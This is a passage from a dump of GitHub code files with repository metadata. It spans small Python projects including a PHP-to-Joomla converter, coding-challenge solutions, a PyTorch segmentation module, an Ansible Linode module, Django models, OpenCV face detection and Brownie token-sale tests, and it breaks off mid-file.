reference_finder.has_include(include_file)\n if incl_counter == 1:\n file_tree.update({include_file: file_name})\n incl_tree(include_file, target_dir_path)\n else:\n file_tree.update({include_file: file_name})\n # print(\"file created : \" + include_file)\n create_target_file(target_dir_path, include_file)\n if file_name in file_creation_map:\n count = file_creation_map[file_name]\n count = count + 1\n file_creation_map.update({file_name: count})\n else:\n count = 1\n file_creation_map.update({file_name: count})\n senior_file = file_tree[include_file]\n senior_count = file_creation_map[senior_file]\n if senior_count == includes.__len__():\n # print(\"file created : \" + senior_file)\n create_target_parent_file(target_dir_path, senior_file)\n if senior_file != check_root():\n supreme_file = file_tree[senior_file]\n if supreme_file in file_creation_map:\n supreme_count = file_creation_map[supreme_file]\n supreme_count = supreme_count + 1\n file_creation_map.update({supreme_file: supreme_count})\n else:\n supreme_count = 1\n file_creation_map.update({supreme_file: supreme_count})\n\n\ndef create_target_directory(directory_path):\n access_rights = 0o755\n if not os.path.exists(directory_path):\n os.mkdir(directory_path, access_rights)\n\n\ndef create_target_file(target_directory_path, source_file_path):\n target_content = \"\"\n target_file_path = \"\"\n source_replacer = SourceReplacer()\n create_target_directory(target_directory_path)\n avoided_file_list = DetailsKeeperDO.get_avoided_file_list(DetailsKeeperDO)\n if DetailsKeeperDO.get_db_conn_file(DetailsKeeperDO) == source_file_path:\n conn_creator = ConnectionCreator()\n target_content = conn_creator.get_new_database_access_file()\n target_file_path = target_directory_path + \"/\" + \"connection.php\"\n elif source_file_path not in avoided_file_list:\n base_name = os.path.basename(source_file_path)\n with open(source_file_path, \"r\") as source_file:\n source_code = source_file.read().replace(\"\\n\", \" \")\n target_file_path = target_directory_path + \"/\" + base_name\n # --check whether the files contain sql queries and convert them to joomla format\n source_code = source_replacer.replace_session_start(source_code)\n source_code = source_replacer.replace_session_details_assignment(source_code)\n source_code = source_replacer.replace_session_details_extraction(source_code)\n source_code = source_replacer.replace_media_references(source_code, source_file_path,\n DetailsKeeperDO.get_source_dir_path(DetailsKeeperDO))\n source_code = BeautifulSoup(source_code, \"html.parser\")\n target_content = source_code.prettify()\n if target_file_path != \"\":\n if not os.path.exists(target_file_path):\n with open(target_file_path, \"w\") as helper_file:\n helper_file.write(target_content)\n\n\ndef create_target_parent_file(target_directory_path, source_file_path):\n reference_finder = ReferenceFinder()\n source_replacer = SourceReplacer()\n base_name = os.path.basename(source_file_path)\n with open(source_file_path) as source_file:\n source_code = source_file.read().replace(\"\\n\", \" \")\n php_occurrences = reference_finder.get_php_occurrences(source_code)\n includes = reference_finder.get_included_php_file_paths(php_occurrences, source_dir_path=\"\",\n need_compl_path=False)\n requires = reference_finder.get_required_php_file_paths(php_occurrences, source_dir_path=\"\",\n need_compl_path=False)\n if includes.__len__() > 0:\n source_code = source_replacer.replace_includes(source_code, includes)\n if requires.__len__() > 0:\n source_code = source_replacer.replace_requires(source_code, requires)\n\n source_code = source_replacer.replace_session_start(source_code)\n source_code = source_replacer.replace_session_details_assignment(source_code)\n source_code = source_replacer.replace_session_details_extraction(source_code)\n source_code = source_replacer.replace_media_references(source_code, source_file_path,\n DetailsKeeperDO.get_source_dir_path(DetailsKeeperDO))\n\n source_code = BeautifulSoup(source_code, \"html.parser\")\n source_code = source_code.prettify()\n target_file_path = target_directory_path + \"/\" + base_name\n if not os.path.exists(target_file_path):\n with open(target_file_path, \"w+\") as helper_file:\n helper_file.write(source_code)\n\n\ndef print_tree():\n for key, val in file_creation_map.items():\n print(key + \" => \" + str(val))\n\n\ndef check_root():\n values = []\n for key, val in file_tree.items():\n values.append(val)\n return values[0]\n","repo_name":"ShanChathusanda93/python-devs","sub_path":"stringfinder/include_tree_detector.py","file_name":"include_tree_detector.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22023402609","text":"\"\"\"\nHave the function FindIntersection(strArr) read the array of strings stored in strArr which will contain 2 elements:\nthe first element will represent a list of comma-separated numbers sorted in ascending order,\nthe second element will represent a second list of comma-separated numbers (also sorted).\nYour goal is to return a comma-separated string containing the numbers that occur in elements of strArr in sorted order.\nIf there is no intersection, return the string false. \"\"\"\n\ndef FindIntersection(strArr):\n\n # code goes here\n intersection = []\n list1 = strArr[0].split(\", \")\n list2 = strArr[1].split(\", \")\n for x in range(len(list1)):\n for y in range(len(list2)):\n if list1[x] == list2[y]:\n intersection.append(list1[x])\n result = \",\".join(intersection)\n if result == \"\":\n return \"false\"\n else:\n return result\n\n# keep this function call here\nprint(FindIntersection(input()))","repo_name":"dzgtr/coderbyte_challenges","sub_path":"5_find_intersection.py","file_name":"5_find_intersection.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"584484478","text":"__all__ = [\"SegmentationLM\"]\n\n# standard libraries\nfrom typing import Any, Optional\n\n# third-party libraries\nimport hydra\nfrom omegaconf import DictConfig\nfrom pytorch_lightning.utilities.types import STEP_OUTPUT\nfrom torchmetrics.classification import (\n BinaryF1Score,\n BinaryRecall,\n BinaryPrecision,\n BinaryJaccardIndex,\n)\nimport torch\nfrom torchmetrics import MetricCollection\nimport lovely_tensors as lt\n\n# local modules\nfrom innofw.constants import SegDataKeys, SegOutKeys\nfrom innofw.core.models.torch.lightning_modules.base import BaseLightningModule\n\n\nlt.monkey_patch()\n\n\nclass SegmentationLM(BaseLightningModule):\n \"\"\"\n PyTorchLightning module for Semantic Segmentation task\n ...\n\n Attributes\n ----------\n model : nn.Module\n model to train\n losses : losses\n loss to use while training\n optimizer_cfg : cfg\n optimizer configurations\n scheduler_cfg : cfg\n scheduler configuration\n threshold: float\n threshold to use while training\n\n Methods\n -------\n forward(x):\n returns result of prediction\n model_load_checkpoint(path):\n load checkpoints to the model, used to start with pretrained weights\n\n \"\"\"\n\n def __init__(\n self,\n model,\n losses,\n # metrics, # todo: add\n optimizer_cfg,\n scheduler_cfg=None,\n threshold=0.5,\n *args: Any,\n **kwargs: Any,\n ):\n super().__init__(*args, **kwargs)\n if isinstance(model, DictConfig):\n self.model = hydra.utils.instantiate(model)\n else:\n self.model = model\n\n self.loss = hydra.utils.instantiate(losses)\n self.optim_config = optimizer_cfg\n self.scheduler_cfg = scheduler_cfg\n self.threshold = threshold\n\n metrics = MetricCollection(\n [\n BinaryF1Score(threshold=threshold),\n BinaryPrecision(threshold=threshold),\n BinaryRecall(threshold=threshold),\n BinaryJaccardIndex(threshold=threshold),\n ]\n )\n self.train_metrics = metrics.clone(prefix=\"train_\")\n self.val_metrics = metrics.clone(prefix=\"val_\")\n self.test_metrics = metrics.clone(prefix=\"test_\")\n\n # self.scaler = GradScaler(enabled=True)\n self.save_hyperparameters(\n ignore=[\"metrics\", \"optim_config\", \"scheduler_cfg\"]\n )\n\n def model_load_checkpoint(self, path):\n self.model.load_state_dict(torch.load(path)[\"state_dict\"])\n\n def forward(self, raster):\n return self.model(raster)\n\n def configure_optimizers(self):\n output = {}\n\n # instantiate the optimizer\n optimizer = hydra.utils.instantiate(\n self.optim_config, params=self.model.parameters()\n )\n output[\"optimizer\"] = optimizer\n\n if self.scheduler_cfg is not None:\n # instantiate the scheduler\n scheduler = hydra.utils.instantiate(\n self.scheduler_cfg, optimizer=optimizer\n )\n output[\"lr_scheduler\"] = scheduler\n\n return output\n\n # def backward(\n # self,\n # loss: Tensor,\n # optimizer: Optional[Optimizer],\n # optimizer_idx: Optional[int],\n # *args,\n # **kwargs,\n # ) -> None:\n # # return super().backward(loss, optimizer, optimizer_idx, *args, **kwargs):\n # self.scaler.scale(loss).backward()\n # self.scaler.step(optimizer)\n # self.scaler.update()\n # self.scheduler.step()\n # torch.cuda.synchronize()\n\n def compute_loss(self, predictions, labels):\n loss = self.loss(predictions, labels)\n\n # with autocast(enabled=train_cfg[\"AMP\"]):\n # logits = model(img)\n # loss = loss_fn(logits, lbl)\n return loss\n # return self.scaler.scale(loss) # todo: refactor !!!!\n\n def compute_metrics(self, stage, predictions, labels):\n if stage == \"train\":\n return self.train_metrics(predictions.view(-1), labels.view(-1))\n elif stage == \"val\":\n out1 = self.val_metrics(predictions.view(-1), labels.view(-1))\n return out1\n elif stage == \"test\":\n return self.test_metrics(predictions.view(-1), labels.view(-1))\n\n def log_losses(self, stage, losses_res):\n self.log(\n f\"{stage}_loss\", losses_res, sync_dist=True\n ) # todo: check when to use this sync_dist=True\n\n def log_metrics(self, stage, metrics_res):\n for key, value in metrics_res.items():\n self.log(key, value, sync_dist=True)\n\n def stage_step(self, stage, batch, do_logging=False, *args, **kwargs):\n output = dict()\n # todo: check that model is in mode no autograd\n raster, label = batch[SegDataKeys.image], batch[SegDataKeys.label]\n\n predictions = self.forward(raster)\n # if (\n # predictions.max() > 1 or predictions.min() < 0\n # ): # todo: should be configurable via cfg file\n # predictions = torch.sigmoid(predictions)\n\n output[SegOutKeys.predictions] = predictions\n\n if stage in [\"train\", \"val\"]:\n loss = self.compute_loss(predictions, label)\n self.log_losses(stage, loss)\n output[\"loss\"] = loss\n\n if stage != \"predict\":\n metrics = self.compute_metrics(\n stage, predictions, label\n ) # todo: uncomment\n self.log_metrics(stage, metrics)\n\n return output\n\n def training_step(self, batch, *args, **kwargs) -> STEP_OUTPUT:\n return self.stage_step(\"train\", batch, do_logging=True)\n\n def validation_step(self, batch, *args, **kwargs) -> Optional[STEP_OUTPUT]:\n return self.stage_step(\"val\", batch)\n\n def test_step(self, batch, *args, **kwargs) -> Optional[STEP_OUTPUT]:\n return self.stage_step(\"test\", batch)\n\n # def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: Optional[int] = None) -> Any:\n # tile, coords = batch[SegDataKeys.image], batch[SegDataKeys.coords]\n #\n # prediction = self.forward(tile)\n # if dataloader_idx is None:\n # self.trainer.predict_dataloaders[0].dataset.add_prediction(prediction, coords, batch_idx)\n # else:\n # self.trainer.predict_dataloaders[dataloader_idx].dataset.add_prediction(prediction, coords, batch_idx)\n","repo_name":"InnopolisUni/innofw","sub_path":"innofw/core/models/torch/lightning_modules/segmentation_qb.py","file_name":"segmentation_qb.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"10898391128","text":"# Leetcode 143\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: Optional[ListNode]) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n if head is None:\n return\n \n # Step 1: split the LL into two halves, find the middle node\n slow = fast = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n \n #Step 2: Reverse the second part of the LL\n prev = None\n current = slow\n \n while current:\n temp = current.next\n current.next = prev\n prev = current\n current = temp\n \n #Step 3: Merge the two linked list\n first = head\n second = prev\n while second.next:\n tmp = first.next\n first.next = second\n first = tmp\n \n tmp = second.next\n second.next = first\n second = tmp\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"Linked_List/ReorderLinkedList.py","file_name":"ReorderLinkedList.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1855073703","text":"\"\"\" Test utility classes \"\"\"\n\nimport os, sys, signal\nimport subprocess\nimport logging\nimport time\nimport socket\n\nfrom tempfile import mkdtemp, mkstemp\nfrom shutil import rmtree\n\nfrom pymongo import Connection\nfrom pymongo.errors import ConnectionFailure\n\ndef get_unused_port():\n \"\"\" Vulnerable to race conditions but good enough for now\"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('localhost', 0))\n addr, port = s.getsockname()\n s.close()\n return port\n\ndef wait_for_port(host, port):\n s = socket.socket()\n while True:\n try:\n s.connect((host, port))\n s.close()\n return\n\n except socket.error:\n time.sleep(0.1)\n\ndef wait_for_process_exit(pid):\n while True:\n try:\n os.kill(pid, 0)\n except OSError:\n return\n\ndef wait_for_pidfile(file_name):\n while True:\n try:\n pid = int(open(file_name).read())\n os.kill(pid, 0)\n return\n\n except (ValueError, TypeError, OSError, IOError):\n time.sleep(0.1)\n\ndef wait_for_mongodb(host, port):\n while True:\n try:\n conn = Connection(host, port, network_timeout=1)\n conn.disconnect()\n return\n\n except ConnectionFailure:\n time.sleep(0.1)\n","repo_name":"andreisavu/automatic-testing-demo","sub_path":"demo/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73719267687","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"This module allows users to retrieve information about a Linode Token.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom typing import Any, Optional\n\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.token as docs_parent\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.token_info as docs\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_common import (\n LinodeModuleBase,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_docs import (\n global_authors,\n global_requirements,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_helper import (\n filter_null_values,\n)\nfrom ansible_specdoc.objects import (\n FieldType,\n SpecDocMeta,\n SpecField,\n SpecReturnValue,\n)\nfrom linode_api4 import PersonalAccessToken\n\nspec = {\n # Disable the default values\n \"state\": SpecField(type=FieldType.string, required=False, doc_hide=True),\n \"id\": SpecField(\n type=FieldType.integer,\n description=[\"The ID of the token.\"],\n conflicts_with=[\"label\"],\n ),\n \"label\": SpecField(\n type=FieldType.string,\n description=[\"The label of the token.\"],\n conflicts_with=[\"id\"],\n ),\n}\n\nSPECDOC_META = SpecDocMeta(\n description=[\"Get info about a Linode Personal Access Token.\"],\n requirements=global_requirements,\n author=global_authors,\n options=spec,\n examples=docs.specdoc_examples,\n return_values={\n \"token\": SpecReturnValue(\n description=\"The token in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/profile/\"\n \"#personal-access-token-create__response-samples\",\n type=FieldType.dict,\n sample=docs_parent.result_token_samples,\n )\n },\n)\n\n\nclass Module(LinodeModuleBase):\n \"\"\"Module for getting info about a Linode token\"\"\"\n\n def __init__(self) -> None:\n self.module_arg_spec = SPECDOC_META.ansible_spec\n self.results = {\"token\": None}\n\n super().__init__(\n module_arg_spec=self.module_arg_spec,\n required_one_of=[(\"id\", \"label\")],\n mutually_exclusive=[(\"id\", \"label\")],\n )\n\n def _get_token_by_label(self, label: str) -> Optional[PersonalAccessToken]:\n try:\n return self.client.profile.tokens(\n PersonalAccessToken.label == label\n )[0]\n except IndexError:\n return self.fail(\n msg=\"failed to get token with label {0}: \"\n \"token does not exist\".format(label)\n )\n except Exception as exception:\n return self.fail(\n msg=\"failed to get token {0}: {1}\".format(label, exception)\n )\n\n def _get_token_by_id(self, token_id: int) -> PersonalAccessToken:\n return self._get_resource_by_id(PersonalAccessToken, token_id)\n\n def exec_module(self, **kwargs: Any) -> Optional[dict]:\n \"\"\"Entrypoint for token info module\"\"\"\n\n params = filter_null_values(self.module.params)\n\n if \"id\" in params:\n self.results[\"token\"] = self._get_token_by_id(\n params.get(\"id\")\n )._raw_json\n\n if \"label\" in params:\n self.results[\"token\"] = self._get_token_by_label(\n params.get(\"label\")\n )._raw_json\n\n return self.results\n\n\ndef main() -> None:\n \"\"\"Constructs and calls the module\"\"\"\n Module()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linode/ansible_linode","sub_path":"plugins/modules/token_info.py","file_name":"token_info.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"15569046131","text":"'''\r\nCreated on 19/set/2017\r\n\r\n@author: Virgilio Cima\r\n'''\r\n\r\nclass ClsSessione(object):\r\n '''\r\n classdocs\r\n '''\r\n\r\n def __init__(self, cod_cts, consegna, data_inizio, path_dat, path_cfg, path_log,operatore,note):\r\n self.id_sessione=0\r\n self.cod_cts=cod_cts\r\n self.consegna=consegna\r\n self.data_inizio=data_inizio\r\n self.path_dat=path_dat\r\n self.path_cfg=path_cfg\r\n self.path_log=path_log # meaningful?\r\n self.operatore=operatore\r\n self.note=note\r\n","repo_name":"raffaele59/PythonDev","sub_path":"GeoControlli_RT/GeoControlli_RT/Main/ClsSessione.py","file_name":"ClsSessione.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40310049400","text":"import sys\nimport heapq\n\ndef solution(n, stars):\n parents = [i for i in range(n)]\n graph = []\n ans = 0\n\n def dist(star1, star2) :\n x1, y1 = star1\n x2, y2 = star2\n return ((x1 - x2)**2 + (y1 - y2)**2)**(1/2)\n\n\n def find(star) :\n if parents[star] != star :\n parents[star] = find(parents[star])\n return parents[star]\n \n def union(star1, star2) :\n p1 = find(star1)\n p2 = find(star2)\n\n parents[max(p1, p2)] = min(p1, p2)\n\n for i in range(n-1) :\n for j in range(i+1,n) :\n heapq.heappush(graph, (dist(stars[i], stars[j]), i, j))\n \n while graph :\n cost, x, y = heapq.heappop(graph)\n\n if find(x) == find(y) :\n continue\n else :\n union(x, y)\n ans += cost\n\n\n print(f\"{ans:.2f}\")\n\n\n\n\n\nif __name__ == \"__main__\" :\n input = sys.stdin.readline\n n = int(input())\n stars = [tuple(map(float, input().split())) for _ in range(n)]\n solution(n, stars)\n\n\n\n# (0,0) 원점을 기준으로 거리 계산을 할 수 있을 것이다 예상 -> 틀렸습니다.\n# import sys\n# import heapq\n\n# def solution(n, stars):\n# parents = [i for i in range(n)]\n# ans = 0\n\n# def find(star) :\n# if parents[star] != star :\n# parents[star] = find(parents[star])\n# return parents[star]\n \n# def union(star1, star2) :\n# p1 = find(star1)\n# p2 = find(star2)\n\n# parents[max(p1, p2)] = min(p1, p2)\n\n# prev = heapq.heappop(stars)\n# while stars :\n# next = heapq.heappop(stars)\n\n# if find(prev[3]) != find(next[3]) :\n# union(prev[3], next[3])\n# ans += ((prev[1] - next[1])**2 + (prev[2] - next[2])**2)**(1/2)\n \n# prev = next\n \n# print(f\"{ans:.2f}\")\n\n\n\n\n\n# if __name__ == \"__main__\" :\n# input = sys.stdin.readline\n# n = int(input())\n# stars = []\n# for i in range(n) :\n# x, y = map(float, input().split())\n# heapq.heappush(stars, (x**2 + y**2, x, y, i))\n# solution(n, stars)","repo_name":"choisaywhy/boj","sub_path":"workbook/12/4386.py","file_name":"4386.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14389871180","text":"# utility script that takes the large csv file with the unlabeled data\n# and chops it up into bite-sized pieces\n# author: David Thaler\n\nimport csv\n\nINFILE = '../data/unlabeled/extra_unsupervised_data.csv'\nOUTFILE_STR = '../data/unlabeled/extra_%d_%d.csv'\nBATCH_SZ = 5000\nf_in = open(INFILE,'rb')\nreader = csv.reader(f_in)\nf_out = open(OUTFILE_STR % (1, BATCH_SZ),'wb')\nwriter = csv.writer(f_out)\nidx = 0\nfor row in reader:\n idx += 1\n writer.writerow(row)\n if idx % BATCH_SZ == 0:\n f_out.close()\n end = idx + BATCH_SZ\n start = idx + 1\n f_out = open(OUTFILE_STR % (start, end),'wb')\n writer = csv.writer(f_out)\n\n#NB: this leaves the end of the last file slightly misnamed/oddly-sized\nf_out.close()","repo_name":"TitasNandi/ICML-BlackBox-Challenge","sub_path":"Sparse_Filtering/batchup.py","file_name":"batchup.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1160768598","text":"# Exercise App\nimport csv\nimport database\nfrom datetime import date\nfrom datetime import datetime\n\nprompt = \"Welcome to the exercise log.\\n\"\nprint(prompt)\nselection = input(\"What would you like to do? 1=single entry, 2=multiple entires, \\\n3=csv file, or '4' to exit. \")\nwhile True:\n if selection == '4':\n print('Goodbye')\n break\n elif selection == '3':\n print(\"placeholder for csv file\")\n break\n\n\n ### START HERE NEXT ###\n # this section sucessfully takes the input...\n # however, it does not print the output when calling the functions\n # I think I need to change the indentation or...\n # remove / alter a break from one of the if statements\n elif selection == '2' or selection == '1':\n log_lst = []\n print(\"-----------test for selection 1 or 2 ------------------\")\n while True:\n add_entry = input(\"Would you like to make an entry? (Y/N): \").upper()\n if add_entry == 'N':\n print(\"No further entries. Exiting the program...\")\n print(\"---------break successful----------------\")\n break\n\n elif add_entry == 'Y':\n print(\"---------------add_entry 'yes' test successful------------\")\n\n # get user input for the date\n def today_date(date):\n date = input(\"Provide the date (e.g 01/25/2022) or hit \\'enter\\' for today's date: \")\n while date != 'exit'.lower():\n if date == 'exit'.lower():\n break\n elif date == \"\":\n tday = datetime.today()\n tday = tday.strftime('%m/%d/%Y')\n year = tday[6:10]\n month = tday[:2]\n dym = tday, int(year), int(month)\n return dym\n elif len(date)==10 and '/' in date:\n tday = date\n year = tday[6:10]\n month = tday[:2]\n dym = tday, int(year), int(month)\n return dym\n else:\n print(\"DATE FORMAT ERROR! Month and day must be two digits.\")\n\n date = input(\"Provide the date (e.g 01/25/2022) or hit \\'enter\\' for today's date: \")\n # function to get user input for miles walked\n def miles_walked():\n miles = input(\"Enter miles walked or hit 'exit': \")\n while miles != 'exit'.lower():\n if miles == 'exit'.lower():\n break\n elif miles.isdigit() and '.' not in miles:\n print(f'You walked {miles} miles.')\n return int(miles)\n elif miles.isdigit() and '.' in miles:\n print(f'You walked {miles} miles.')\n return int(miles)\n else:\n print(\"ERROR! Enter a digit.\")\n\n miles = input(\"Enter miles walked or hit 'exit': \")\n\n # call the functions\n # append the output of the functions into a list\n lst = []\n for item in today_date(date):\n lst.append(item)\n lst.append(miles_walked())\n print(\"------------ func call successful -----------------\")\n log_lst.append(lst)\n print(\"-------------test list input -----------------------\")\n print(log_lst)\n continue\n break\n\n # OUTER WHILE LOOP: exit if user does not select an entry 1-4\n else:\n print(\"Invalid entry. Exiting the program....\")\n break\n # call the database.py functions to add records to the db\n # database.add_one(log_lst)\n database.add_many(log_lst)\n print(database.show_all())\n","repo_name":"ARCtechmo/exercise_app","sub_path":"ex_app.py","file_name":"ex_app.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74375963047","text":"import cv2\r\n\r\nimg = cv2.imread('fahmi.PNG')\r\n\r\nface = cv2.CascadeClassifier('face-detect.xml')\r\neye = cv2.CascadeClassifier('eye-detect.xml')\r\n\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\nmuka = face.detectMultiScale(gray, 1.3, 5)\r\nfor (x,y,w,h) in muka:\r\n cv2.rectangle(img, (x,y), (x+w, y+h), (0,255,0), 2)\r\n\r\n cv_warna = img[y:y+h, x:x+w]\r\n cv_gray = gray[y:y+h, x:x+w]\r\n mata = eye.detectMultiScale(cv_gray, 1.5, 3)\r\n for (mx,my,mw,mh) in mata:\r\n cv2.rectangle(cv_warna, (mx,my), (mx+mw, my+mh), (255, 255, 0), 1)\r\n\r\ncv2.imshow('Foto Normal', img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"Fahmifc123/OpenCV-Indonesia","sub_path":"2. detect_mata.py","file_name":"2. detect_mata.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16551818763","text":"from board import *\nfrom solution import *\n\nif __name__ == \"__main__\":\n\t\n\t#create board\n\tfilename = 'test_case.txt'\n\tboard = Board()\t\n\tboard.grid = board.load_board(filename)\n\n\t#find answer\n\tsol = Solution()\n\tboard.grid = sol.solution_(board.grid)\n\n\t# load actual answer:\n\tfilename = 'answer.txt'\n\tanswer_board = Board()\n\tanswer_board.grid = answer_board.load_board(filename)\n\n\t# compare 2 answers:\n\tif answer_board.is_same(board) == True:\n\t\tprint(\"The solution is true \")\n\t\tboard.print_board()\n\telse :\n\t\tprint(\"Wrong solution\")\n\n","repo_name":"nnkhang19/Sudoku_using_backtracking","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2683007382","text":"#!/usr/bin/python3\r\n\"\"\" Minimum Operations Algorithm Problem \"\"\"\r\n\r\n\r\ndef minOperations(n: int) -> int:\r\n \"\"\" Calculates minimum number of operations required to create a string \"\"\"\r\n \"\"\" of input n length \"\"\"\r\n\r\n if not n or not isinstance(n, int) or n <= 1:\r\n return 0\r\n count = 1\r\n operations_list = []\r\n while n > 1:\r\n count += 1\r\n while (n % count == 0 and n > 1):\r\n n /= count\r\n operations_list.append(count)\r\n return sum(operations_list)\r\n","repo_name":"angelofgrace/holbertonschool-interview","sub_path":"0x02-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19546980532","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n\nclass CustomUser(AbstractUser):\n email = models.EmailField(\n max_length=254,\n unique=True,\n verbose_name='Электронная почта'\n )\n first_name = models.CharField(\n max_length=150,\n verbose_name='Имя'\n )\n last_name = models.CharField(\n max_length=150,\n verbose_name='Фамилия'\n )\n\n class Meta:\n verbose_name = \"Пользователь\"\n verbose_name_plural = \"Пользователи\"\n\n def __str__(self):\n return self.username\n\n\nUser = get_user_model()\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик'\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='following',\n verbose_name='Автор'\n )\n\n class Meta:\n verbose_name = \"Подписка\"\n verbose_name_plural = \"Подписки\"\n ordering = ['user']\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'author'],\n name='unique_follow_model'\n )\n ]\n\n def __str__(self):\n return self.user.username\n","repo_name":"NikitaChalykh/Foodgramm","sub_path":"backend/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8156942118","text":"#!/usr/bin/python3\nimport pytest\nimport brownie\nfrom brownie import chain, network, FTGSale, accounts\nfrom scripts.deploy_FTGStaking import deploy_FTGStaking\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef ftgstaking(accounts, ftgtoken):\n # ftgstaking deployment\n ftgstaking = deploy_FTGStaking(ftgtoken.address, accounts[0])\n return ftgstaking\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef ntt(accounts, NTT):\n # accounts[0] deploys NTT contract\n ntt = NTT.deploy(\"NTT\", 18, {\"from\": accounts[0]})\n return ntt\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef ftgsale(accounts, ntt, ftgstaking, ftgtoken, investtoken):\n # FTGSale deployment\n _totalTokensToSell = 10_000_000 * 10 ** 18\n _totalToRaise = 100_000 * 10 ** 18\n # token price (price of 1 token = 10**18 \"tokenWei\" in investToken)\n _tokenPrice = int(_totalToRaise / _totalTokensToSell * 10 ** 18)\n print(\"_tokenPrice = \", _tokenPrice)\n # accounts[0] deploys FTGSale contract\n ftgsale = FTGSale.deploy(\n ntt,\n investtoken,\n ftgstaking,\n _tokenPrice,\n _totalTokensToSell,\n _totalToRaise,\n {\"from\": accounts[0]},\n )\n # add ownership of ntt to ftgsale\n ntt.addOwner(ftgsale, {\"from\": accounts[0]})\n return ftgsale\n\n\ndef test_setup_phase(ftgsale, ntt, accounts, ftgtoken, investtoken):\n print(\"********************Setup Phase Tests********************\")\n # verifies that we are in setup phase of the sale\n assert ftgsale.salePhase() == 0\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n\n # definition of Sale's Phases durations\n phaseDuration = 86400 # one day\n ftgsale.setPhasesDurations(phaseDuration, phaseDuration, phaseDuration)\n assert ftgsale.registrationPhaseDuration() == phaseDuration\n # definition of Tiers minimum ftg locked staking\n RUBY_MIN = 100_000 * 10 ** 18\n SAPPHIRE_MIN = 250_000 * 10 ** 18\n EMERALD_MIN = 500_000 * 10 ** 18\n DIAMOND_MIN = 1_000_000 * 10 ** 18\n ftgsale.setTiersMinFTGStakings(RUBY_MIN, SAPPHIRE_MIN, EMERALD_MIN, DIAMOND_MIN)\n assert ftgsale.tiersMinFTGStaking(NONE) == 0\n assert ftgsale.tiersMinFTGStaking(RUBY) == 100_000 * 10 ** 18\n assert ftgsale.tiersMinFTGStaking(SAPPHIRE) == 250_000 * 10 ** 18\n assert ftgsale.tiersMinFTGStaking(EMERALD) == 500_000 * 10 ** 18\n assert ftgsale.tiersMinFTGStaking(DIAMOND) == 1_000_000 * 10 ** 18\n # definition of tiers allocation factors\n ftgsale.setTiersTokensAllocationFactors(2, 4, 8, {\"from\": accounts[0]})\n assert ftgsale.tiersTokensAllocationFactor(RUBY) == 1\n assert ftgsale.tiersTokensAllocationFactor(SAPPHIRE) == 2\n assert ftgsale.tiersTokensAllocationFactor(EMERALD) == 4\n assert ftgsale.tiersTokensAllocationFactor(DIAMOND) == 8\n # test if factors are not in ascendant order\n with brownie.reverts(\"factors must be increasing from lower to higher 